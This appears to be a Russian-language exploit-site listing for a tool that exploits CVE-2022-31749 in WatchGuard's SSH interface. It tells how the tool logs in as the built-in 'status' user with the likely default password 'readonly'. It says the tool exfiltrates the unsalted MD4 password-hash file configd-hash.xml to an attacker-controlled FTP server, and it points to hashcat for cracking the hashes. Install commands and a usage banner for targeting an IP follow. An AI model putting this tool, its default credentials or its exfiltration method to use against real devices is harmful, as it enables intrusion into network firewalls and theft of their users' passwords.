## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IVERESK-CVE-2022-31749
# CVE-2022-31749 от 1vere$k
Простой PoC-чекер для CVE-2022-31749 от 1vere$k.
Он эксплуатирует уязвимость внедрения параметров в SSH-интерфейсе `WatchGuard`.
Уязвимость позволяет пользователю с низкими привилегиями выгружать произвольные системные файлы на FTP-сервер, контролируемый атакующим.
К счастью, есть встроенный пользователь с низкими привилегиями по имени status, которого использует этот скрипт по умолчанию.
Вполне разумно предположить, что `пользователь status` использует `пароль readonly`, но это не обязательно.
Эксплойт выгружает пользовательский файл `configd-hash.xml`.
Этот файл содержит хешированные пароли пользователей.
Хеши представляют собой просто несолёный MD4. @funoverip описал использование hashcat для взлома хешей из этого файла ещё в 2013 году
## Установка
root@kitploit:~
1. git clone https://github.com/iveresk/cve-2022-31749.git
2. cd cve-2022-31749
3. chmod +x *.sh
4. ./setup.sh
## Использование
root@kitploit:~
echo "-------------------Welcome-to-CVE-2022-31749-by-1veresk----------------+";
echo "+----------------------------------------------------------------------+";
echo "+-------------------For-The-Help---------------------------------------+";
echo "Example#1: ./cve-2022-31749.sh -h--------------------------------------+";
echo "Example#2: ./cve-2022-31749.sh --help----------------------------------+";
echo "+-------------------For-The-URL-Check----------------------------------+";
echo "Example#1: ./cve-2022-31749.sh -u <IP> <PASSWORD> [Default is 'readonly'";
echo "+-------------------For-The-File-Check---------------------------------+";
echo "Example#1: ./cve-2022-31749.sh -f <FILENAME>-<PASSFILE>----------------+";
echo "+----------------------------------------------------------------------+";
## Контакты
Вы можете свободно связаться со мной через Keybase для получения любых деталей.